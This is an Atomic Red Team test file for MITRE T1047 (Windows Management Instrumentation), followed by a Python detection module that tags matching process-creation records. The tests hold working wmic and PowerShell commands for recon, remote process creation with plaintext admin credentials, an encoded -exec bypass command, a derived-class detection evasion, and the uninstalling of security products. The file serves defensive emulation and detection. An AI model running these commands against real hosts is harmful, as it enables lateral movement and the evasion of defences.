# T1047.yaml
attack_technique: T1047
display_name: Windows Management Instrumentation
atomic_tests:
- name: WMI Reconnaissance Users
  auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea
  description: |
    An adversary might use WMI to list all local user accounts.
    When the test completes, local user account information should be displayed on the command line.
  supported_platforms:
  - windows
  executor:
    command: |
      wmic useraccount get /ALL /format:csv
    name: command_prompt
- name: WMI Reconnaissance Processes
  auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
  description: |
    An adversary might use WMI to list the processes running on the compromised host.
    When the test completes, the running processes should be listed on the command line.
  supported_platforms:
  - windows
  executor:
    command: |
      wmic process get caption,executablepath,commandline /format:csv
    name: command_prompt
- name: WMI Reconnaissance Software
  auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
  description: |
    An adversary might use WMI to list installed software hotfixes and patches.
    When the test completes, there should be a list of installed patches and when they were installed.
  supported_platforms:
  - windows
  executor:
    command: |
      wmic qfe get description,installedOn /format:csv
    name: command_prompt
- name: WMI Reconnaissance List Remote Services
  auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
  description: |
    An adversary might use WMI to check whether a particular service is running on a remote device.
    When the test completes, the service's information will be displayed if the service exists.
    If the queried service is not running, wmic reports "No instance(s) Available".
    If the provided remote host is unreachable, wmic reports
    "Node - (provided IP or default) ERROR Description = The RPC server is unavailable".
  supported_platforms:
  - windows
  input_arguments:
    node:
      description: IP address
      type: string
      default: 127.0.0.1
    service_search_string:
      description: Name of service
      type: string
      default: Spooler
  executor:
    command: |
      wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
    name: command_prompt
- name: WMI Execute Local Process
  auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
  description: |
    This test uses wmic.exe to execute a process on the local host.
    When the test completes, a new process will be started locally. Notepad will be started when the input is left at its default.
  supported_platforms:
  - windows
  input_arguments:
    process_to_execute:
      description: Name or path of process to execute.
      type: string
      default: notepad.exe
  executor:
    command: |
      wmic process call create #{process_to_execute}
    cleanup_command: |
      wmic process where name='#{process_to_execute}' delete >nul 2>&1
    name: command_prompt
- name: WMI Execute Remote Process
  auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
  description: |
    This test uses wmic.exe to execute a process on a remote host. Specify a valid remote IP using the node parameter.
    To clean up, provide the same node input that was used to run the test.
    If the default or provided IP is unreachable, wmic reports "Node - (provided IP or default) ERROR Description = The RPC server is unavailable".
    Note that the username and password are passed on the wmic command line, so they are recorded by any process command-line logging on the source host.
  supported_platforms:
  - windows
  input_arguments:
    node:
      description: IP address
      type: string
      default: 127.0.0.1
    user_name:
      description: Username
      type: string
      default: DOMAIN\Administrator
    password:
      description: Password
      type: string
      default: P@ssw0rd1
    process_to_execute:
      description: Name or path of process to execute.
      type: string
      default: notepad.exe
  executor:
    command: |
      wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
    cleanup_command: |
      wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
    name: command_prompt
- name: Create a Process using WMI Query and an Encoded Command
  auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
  description: |
    Solorigate persistence was achieved via backdoors deployed through various techniques, including PowerShell with an EncodedCommand:
    Powershell -nop -exec bypass -EncodedCommand <encoded command>
    where the -EncodedCommand (the command text as UTF-16LE, base64-encoded), once decoded, would resemble:
    Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs' -ComputerName WORKSTATION
    The EncodedCommand in this atomic decodes to: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
    You should expect to see notepad.exe running after execution of this test.
    [Solorigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
  supported_platforms:
  - windows
  executor:
    command: |
      powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
    name: command_prompt
- name: Create a Process using obfuscated Win32_Process
  auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
  description: |
    This test tries to mask process creation by creating a new WMI class that inherits from Win32_Process and calling Create on the derived class.
    Invoking a suspicious method such as Win32_Process::Create indirectly, through a class with an arbitrary name, can break detection logic that keys on the class name.
    [Cybereason blog post No Win32_Process Needed](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
  supported_platforms:
  - windows
  input_arguments:
    new_class:
      description: Derived class name
      type: string
      default: Win32_Atomic
    process_to_execute:
      description: Name or path of process to execute.
      type: string
      default: notepad.exe
  executor:
    name: powershell
    elevation_required: true
    command: |
      $Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
      $NewClass = $Class.Derive("#{new_class}")
      $NewClass.Put()
      Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
    cleanup_command: |
      $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
      try { $CleanupClass.Delete() } catch {}
- name: WMI Execute rundll32
  auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243
  description: |
    This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
  supported_platforms:
  - windows
  input_arguments:
    node:
      description: IP address
      type: string
      default: 127.0.0.1
    dll_to_execute:
      description: Path to DLL.
      type: string
      default: PathToAtomicsFolder\..\ExternalPayloads\calc.dll
    function_to_execute:
      description: Name of DLL function to call
      type: string
      default: StartW
  dependency_executor_name: powershell
  dependencies:
  - description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
    prereq_command: |
      if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
  executor:
    command: |
      wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
    cleanup_command: |-
      taskkill /f /im calculator.exe
    name: command_prompt
- name: Application uninstall using WMIC
  auto_generated_guid: c510d25b-1667-467d-8331-a56d3e9bc4ff
  description: |
    Emulates uninstalling an application using WMIC. This method only works if the product was installed from an MSI package, because the Win32_Product class only covers Windows Installer products. APTs have been seen using this to uninstall security products.
  supported_platforms:
  - windows
  input_arguments:
    node:
      description: Computer the action is executed against; defaults to the local host.
      type: string
      default: 127.0.0.1
    product:
      description: Name of the product being uninstalled. Defaults to TightVNC.
      type: string
      default: Tightvnc
  dependency_executor_name: powershell
  dependencies:
  - description: TightVNC must be installed.
    prereq_command: |
      if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe") -Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
    get_prereq_command: |-
      Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
      start-sleep -s 10
      msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
      start-sleep -s 15
  executor:
    command: wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
    cleanup_command: msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
    name: command_prompt
    elevation_required: true
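Detection side, as an added example that is not part of the Atomic Red Team project or of this file: a small Python module that tags process-creation records matching the command patterns the atomics above generate (wmic recon, `process call create`, `/node:` against a non-local target, credentials on the command line, `product ... call uninstall`, `-EncodedCommand`, and a child of WmiPrvSE.exe). The records are constructed samples shaped like Security 4688 / Sysmon Event ID 1 fields (image, parent image, command line), not real telemetry; the executable paths and the 10.0.0.5 target are assumed values, while the base64 blob is the exact `-EncodedCommand` from the encoded-command atomic, recovered here by base64-decoding and reading the bytes as UTF-16LE. Keying process creation on the method name (`create`) rather than on the `Win32_Process` class name is what keeps the derived-class atomic from slipping past the rule.

```python
"""Tag process-creation records that match the wmic / Invoke-WmiMethod command
patterns exercised by the T1047 atomics. Added example; all samples are constructed."""
import base64
import re

# Executable paths are assumed for the samples, not taken from the atomics.
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
CMD = r"C:\Windows\System32\cmd.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"

# The exact -EncodedCommand payload used by the "Encoded Command" atomic.
ENCODED = "SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA"

# Constructed records shaped like Security 4688 / Sysmon EID 1 fields.
# 10.0.0.5 is an assumed remote target; 127.0.0.1 mirrors the atomics' default node.
SAMPLE_EVENTS = [
    {"image": WMIC, "parent": CMD, "cmdline": "wmic useraccount get /ALL /format:csv"},
    {"image": WMIC, "parent": CMD, "cmdline": "wmic process call create notepad.exe"},
    {"image": WMIC, "parent": CMD,
     "cmdline": 'wmic /user:DOMAIN\\Administrator /password:P@ssw0rd1 '
                '/node:"10.0.0.5" process call create notepad.exe'},
    {"image": POWERSHELL, "parent": CMD, "cmdline": "powershell -exec bypass -e " + ENCODED},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": WMIPRVSE, "cmdline": "notepad.exe"},
    {"image": WMIC, "parent": CMD,
     "cmdline": 'wmic /node:"127.0.0.1" product where "name like \'Tightvnc%%\'" call uninstall'},
    {"image": POWERSHELL, "parent": CMD,
     "cmdline": "powershell Invoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe"},
]

# powershell.exe accepts -EncodedCommand, -enc, -ec and -e; the value is base64 of UTF-16LE text.
ENC_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
NODE_RE = re.compile(r'/node:\s*"?([^\s"]+)')
LOCAL_NODES = {"127.0.0.1", "localhost", "."}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none / it is malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the set of T1047-related tags that apply to one process record."""
    tags = set()
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"].lower()
    if decoded is not None:
        tags.add("encoded_command")
        text += " " + decoded.lower()   # match the rules against the decoded payload too
    is_wmic = event["image"].lower().endswith("wmic.exe") or text.lstrip().startswith("wmic")
    # Process creation: "process call create" from wmic, or any WMI/CIM call to a
    # method named create. Keying on the method rather than on Win32_Process is
    # what still catches a class derived from it under another name.
    if re.search(r"\bprocess\s+call\s+create\b", text) or re.search(
            r"invoke-(?:wmi|cim)method\b.*-(?:name|methodname)\s+create\b", text):
        tags.add("process_create")
    if is_wmic and " call " not in text and re.search(r"\b(useraccount|qfe|service|process)\b", text):
        tags.add("recon")
    if re.search(r"\bproduct\b.*\bcall\s+uninstall\b", text):
        tags.add("uninstall")
    node = NODE_RE.search(text)
    if node and node.group(1) not in LOCAL_NODES:
        tags.add("remote_target")
    if "/user:" in text and "/password:" in text:
        tags.add("cleartext_creds")    # the credentials land in command-line telemetry
    if event.get("parent", "").lower().endswith("wmiprvse.exe"):
        tags.add("wmiprvse_child")     # how a WMI-created process shows up on the target
    return tags


def scan(events=SAMPLE_EVENTS):
    """Classify every record; returns (truncated command line, sorted tags) pairs."""
    return [(e["cmdline"][:60], sorted(classify(e))) for e in events]


if __name__ == "__main__":
    for line, tags in scan():
        print(f"{str(tags):<48} {line}")
```

Run it directly to print one tag list per record. The WmiPrvSE.exe parent check is the one that fires on the target side regardless of whether the creation came from a local `wmic process call create`, a remote `/node:` call, or the derived-class trick, so a production rule would pair it with the source-side command-line matches rather than rely on either alone.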